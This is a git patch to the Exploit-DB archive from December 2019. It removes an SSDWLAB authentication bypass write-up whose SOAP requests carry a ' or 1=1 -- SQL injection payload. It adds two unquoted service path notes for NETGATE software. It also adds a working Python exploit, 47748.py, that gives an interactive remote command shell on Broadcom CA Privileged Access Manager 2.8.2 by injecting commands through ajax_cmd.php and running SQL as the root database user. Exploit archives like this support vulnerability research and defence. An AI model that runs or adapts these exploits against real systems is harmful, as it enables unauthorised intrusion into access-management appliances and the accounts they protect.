From efa6ef060e644dcdf0a4ebaa711b698914aeade8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 6 Dec 2019 05:02:01 +0000 Subject: [PATCH] DB: 2019-12-06 5 changes to exploits/shellcodes NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path Amiti Antivirus 25.0.640 - Unquoted Service Path SSDWLAB 6.1 - Authentication Bypass Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution --- exploits/aspx/webapps/47742.txt | 76 ------------------------------- exploits/windows/local/47746.txt | 25 ++++++++++ exploits/windows/local/47747.txt | 39 ++++++++++++++++ exploits/windows/webapps/47748.py | 71 +++++++++++++++++++++++++++++ files_exploits.csv | 4 +- 5 files changed, 138 insertions(+), 77 deletions(-) delete mode 100644 exploits/aspx/webapps/47742.txt create mode 100644 exploits/windows/local/47746.txt create mode 100644 exploits/windows/local/47747.txt create mode 100755 exploits/windows/webapps/47748.py diff --git a/exploits/aspx/webapps/47742.txt b/exploits/aspx/webapps/47742.txt deleted file mode 100644 index 1e3dfa242..000000000 --- a/exploits/aspx/webapps/47742.txt +++ /dev/null @@ -1,76 +0,0 @@ -# Exploit Title: SSDWLAB 6.1 - Authentication Bypass -# Date: 2019-10-01 -# Exploit Author: Luis Buendía (exoticpayloads) -# Vendor Homepage: http://www.sbpsoftware.com/ -# Version: 6.1 -# Tested on: IIS 7.5 -# CVE : Pending -#Description: By injection on the SOAP function in the EditUserPassword function, it is possible to create a "fake" user and authenticate with it. - -Request to the EditUserPassword Function - -POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1 -Host: XXXXXXX.com -Content-Type: text/xml; charset=utf-8 -Content-Length: 462 -SOAPAction: "http://tempuri.org/EditUserPassword" - - - - - - ' or 1=1 -- - string - string - ENG - - - - -Example of Response when injection is succesfull - -HTTP/1.1 200 OK -Cache-Control: private, max-age=0 -Content-Type: text/xml; charset=utf-8 -X-AspNet-Version: 4.0.30319 -X-Powered-By: XXX.XXX -Content-Length: 421 - -0 - -Request to Login After Successful Request - -POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1 -Host: XXXXXXX.com -User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Connection: close -Referer: https://XXXXXXX.com/PATH-TO-WEB-SERVICE/main.swf/[[DYNAMIC]]/2 -Content-Type: text/xml; charset=utf-8 -SOAPAction: "http://tempuri.org/Login" -Content-Length: 406 - - - - - ' or 1=1 -- - string - ENG - - - - -Example of succesfull login - -HTTP/1.1 200 OK -Cache-Control: private, max-age=0 -Content-Type: text/xml; charset=utf-8 -Vary: Accept-Encoding -X-AspNet-Version: 4.0.30319 -X-Powered-By: XXX.XXX -Connection: close -Content-Length: 422 - -0d62cc3c0b2e3413cb8b4a85b0fa6177b \ No newline at end of file diff --git a/exploits/windows/local/47746.txt b/exploits/windows/local/47746.txt new file mode 100644 index 000000000..27dedca39 --- /dev/null +++ b/exploits/windows/local/47746.txt @@ -0,0 +1,25 @@ +#Exploit Title: NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path +#Exploit Author : ZwX +#Exploit Date: 2019-12-04 +#Vendor Homepage : http://www.netgate.sk/ +#Link Software : http://www.netgate.sk/download/download.php?id=5 +#Tested on OS: Windows 7 + + +#Analyze PoC : +============== + + +C:\Users\ZwX>sc qc NGDatBckpSrv +[SC] QueryServiceConfig réussite(s) + +SERVICE_NAME: NGDatBckpSrv + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\NETGATE\Data Backup\DataBackupSrv.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : NETGATE Data Backup Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/47747.txt b/exploits/windows/local/47747.txt new file mode 100644 index 000000000..2a28e4cb3 --- /dev/null +++ b/exploits/windows/local/47747.txt @@ -0,0 +1,39 @@ +#Exploit Title: Amiti Antivirus 25.0.640 - Unquoted Service Path +#Exploit Author : ZwX +#Exploit Date: 2019-12-04 +#Vendor Homepage : http://www.netgate.sk/ +#Link Software : https://www.netgate.sk/download/download.php?id=11 +#Tested on OS: Windows 7 + + +#Analyze PoC : +============== + + +C:\Users\ZwX>sc qc ScsiAccess +[SC] QueryServiceConfig réussite(s) + +SERVICE_NAME: AmitiAvHealth + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusHealth.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Amiti Antivirus Health Check + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\ZwX>sc qc AmitiAvSrv +[SC] QueryServiceConfig réussite(s) + +SERVICE_NAME: AmitiAvSrv + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusSrv.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Amiti Antivirus Engine Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/webapps/47748.py b/exploits/windows/webapps/47748.py new file mode 100755 index 000000000..ed8ed30af --- /dev/null +++ b/exploits/windows/webapps/47748.py @@ -0,0 +1,71 @@ +# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution +# Author: Peter Lapp +# Date: 2019-12-05 +# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html +# CVE: CVE-2018-9021 and CVE-2018-9022 +# Tested on: v2.8.2 + +import urllib2 +import urllib +import ssl +import sys +import json +import base64 + + +ctx = ssl.create_default_context() +ctx.check_hostname = False +ctx.verify_mode = ssl.CERT_NONE + + +def send_command(ip, cmd): + cmd = urllib.quote_plus(cmd) + url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test' + request = urllib2.Request(url, None) + response = urllib2.urlopen(request, context=ctx) + result = json.load(response) + return result['responseData'] + +def get_db_value(): + cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag" + db_value = send_command(ip,cmd) + db_value = db_value.split('\n')[1] + return db_value + +def encode_payload(cmd): + sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'" + cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag " + return cmd + +def restore_sql(value): + sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'" + cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag " + send_command(ip,cmd) + +def main(): + print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)''' + + if len(sys.argv) != 2: + print "Usage: xceedium_rce.py " + sys.exit() + + global ip + ip = sys.argv[1] + print 'Enter commands below. Type exit to quit' + + while True: + cmd = raw_input('# ') + if cmd == "exit": + sys.exit() + orig_value = get_db_value() + payload = encode_payload(cmd) + send_command(ip, payload) + send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210') + output = send_command(ip, 'cat /tmp/output') + print output + restore_sql(orig_value) + + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a730dbf47..635523c9d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10825,6 +10825,8 @@ id,file,description,date,author,type,platform,port 47735,exploits/xml/local/47735.txt,"Microsoft Excel 2016 1901 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml, 47740,exploits/xml/local/47740.txt,"Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass",2019-12-03,hyp3rlinx,local,xml, 47743,exploits/xml/local/47743.txt,"Microsoft Visual Basic 2010 Express - XML External Entity Injection",2019-12-04,ZwX,local,xml, +47746,exploits/windows/local/47746.txt,"NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path",2019-12-05,ZwX,local,windows, +47747,exploits/windows/local/47747.txt,"Amiti Antivirus 25.0.640 - Unquoted Service Path",2019-12-05,ZwX,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42053,6 +42055,6 @@ id,file,description,date,author,type,platform,port 47738,exploits/hardware/webapps/47738.txt,"Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery",2019-12-03,"Prof. Joas Antonio",webapps,hardware,80 47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php, 47741,exploits/php/webapps/47741.txt,"Online Clinic Management System 2.2 - HTML Injection",2019-12-04,"Cemal Cihad ÇİFTÇİ",webapps,php, -47742,exploits/aspx/webapps/47742.txt,"SSDWLAB 6.1 - Authentication Bypass",2019-12-04,"Luis Buendía",webapps,aspx, 47744,exploits/hardware/webapps/47744.txt,"Cisco WLC 2504 8.9 - Denial of Service (PoC)",2019-12-04,SecuNinja,webapps,hardware, 47745,exploits/php/webapps/47745.txt,"OwnCloud 8.1.8 - Username Disclosure",2019-12-04,"Daniel Moreno",webapps,php, +47748,exploits/windows/webapps/47748.py,"Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution",2019-12-05,"Peter Lapp",webapps,windows,